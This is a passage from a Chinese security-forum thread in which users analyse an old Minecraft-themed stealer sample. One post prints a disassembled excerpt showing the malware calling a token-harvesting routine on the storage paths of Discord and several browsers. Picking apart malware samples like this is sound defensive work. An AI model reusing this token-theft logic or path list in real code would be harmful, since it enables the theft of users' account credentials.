收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 奶酪勒索源文件
123
返回列表 发新帖
楼主: tjsh
 收起左侧

[病毒样本] 奶酪勒索源文件

[复制链接]
Allure361
发表于 2024-1-30 16:57:08 | 显示全部楼层
tjsh 发表于 2024-1-30 16:43
很多人都中过,DC号一夜之间消失

能确定的是它loadMCtokens 这个方法是返回了launcher_profiles.json里面的accessToken和displayName,就是用户名和登录令牌被获取了

loadDCtokens方法就是先遍历到你电脑DC的LevelDB 把你的DC的登录令牌的字符串给获取了
回复

举报

tjsh
 楼主| 发表于 2024-1-30 17:14:23 | 显示全部楼层
Allure361 发表于 2024-1-30 16:57
能确定的是它loadMCtokens 这个方法是返回了launcher_profiles.json里面的accessToken和displayName,就 ...

那是肯定的,我以前大概看了一眼,但是哪个混淆确实没法看但是勉强看到它发送东西

评分

参与人数 1人气 +1 收起 理由
Allure361 + 1 赞同

查看全部评分

回复

举报

DisaPDB
发表于 2024-1-30 17:18:57 | 显示全部楼层
Allure361 发表于 2024-1-30 16:57
能确定的是它loadMCtokens 这个方法是返回了launcher_profiles.json里面的accessToken和displayName,就 ...

是的
  1. met004_199:                                    ; DATA XREF: met004_slot024↓i
  2.     ldc "Roaming\\discord"
  3.     invokestatic net/minecraft/entity/EntityShow.loadDCtokens(Ljava/lang/Stri\
  4. ng;)Ljava/lang/String;
  5.     astore 25
  6.   .line 86
  7.   met004_206:                                    ; DATA XREF: met004_slot025↓i
  8.     ldc "Roaming\\discordcanary"
  9.     invokestatic net/minecraft/entity/EntityShow.loadDCtokens(Ljava/lang/Stri\
  10. ng;)Ljava/lang/String;
  11.     astore 26
  12.   .line 87
  13.   met004_213:                                    ; DATA XREF: met004_slot026↓i
  14.     ldc "Roaming\\discordptb"
  15.     invokestatic net/minecraft/entity/EntityShow.loadDCtokens(Ljava/lang/Stri\
  16. ng;)Ljava/lang/String;
  17.     astore 27
  18.   .line 88
  19.   met004_220:                                    ; DATA XREF: met004_slot027↓i
  20.     ldc "Local\\Google\\Chrome\\User Data\\Default"
  21.     invokestatic net/minecraft/entity/EntityShow.loadDCtokens(Ljava/lang/Stri\
  22. ng;)Ljava/lang/String;
  23.     astore 28
  24.   .line 89
  25.   met004_227:                                    ; DATA XREF: met004_slot028↓i
  26.     ldc "Roaming\\Opera Software\\Opera Stable"
  27.     invokestatic net/minecraft/entity/EntityShow.loadDCtokens(Ljava/lang/Stri\
  28. ng;)Ljava/lang/String;
  29.     astore 29
  30.   .line 90
  31.   met004_234:                                    ; DATA XREF: met004_slot029↓i
  32.     ldc "Local\\BraveSoftware\\Brave-Browser\\User Data\\Default"
  33.     invokestatic net/minecraft/entity/EntityShow.loadDCtokens(Ljava/lang/Stri\
  34. ng;)Ljava/lang/String;
  35.     astore 30
  36.   .line 91
  37.   met004_241:                                    ; DATA XREF: met004_slot030↓i
  38.     ldc "Local\\Yandex\\YandexBrowser\\User Data\\Default"
  39.     invokestatic net/minecraft/entity/EntityShow.loadDCtokens(Ljava/lang/Stri\
  40. ng;)Ljava/lang/String;
  41.     astore 31
  42.   .line 93
复制代码
调用net/minecraft/entity/EntityShow.loadDCtokens读取浏览器保存的记录转为字符串,并将参数压入方法栈中


评分

参与人数 1人气 +1 收起 理由
Allure361 + 1 感谢解答: )

查看全部评分

回复

举报

python无名氏
发表于 2024-1-31 12:07:13 | 显示全部楼层
程序在微步上首次提交于2022/03/13,也算老毒了。。。
看微步似乎会访问一个内网地址
回复

举报

tjsh
 楼主| 发表于 2024-1-31 12:30:50 | 显示全部楼层
python无名氏 发表于 2024-1-31 12:07
程序在微步上首次提交于2022/03/13,也算老毒了。。。
看微步似乎会访问一个内网地址

无名氏?
这个玩意就是Stealer一个,很老的东西,
回复

举报

yaokai815
发表于 2024-1-31 17:41:35 | 显示全部楼层
金山毒霸

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

python无名氏
发表于 2024-2-1 11:08:53 | 显示全部楼层
tjsh 发表于 2024-1-31 12:30
无名氏?
这个玩意就是Stealer一个,很老的东西,

这个内网地址好像还有别的盗号、远控也访问过兴许是一个作者?不知道访问内网地址有啥用
回复

举报

tjsh
 楼主| 发表于 2024-2-1 11:14:29 | 显示全部楼层
python无名氏 发表于 2024-2-1 11:08
这个内网地址好像还有别的盗号、远控也访问过兴许是一个作者?不知道访问内网地址有啥用

IDK
回复

举报

123
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-16 10:21 , Processed in 0.100608 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表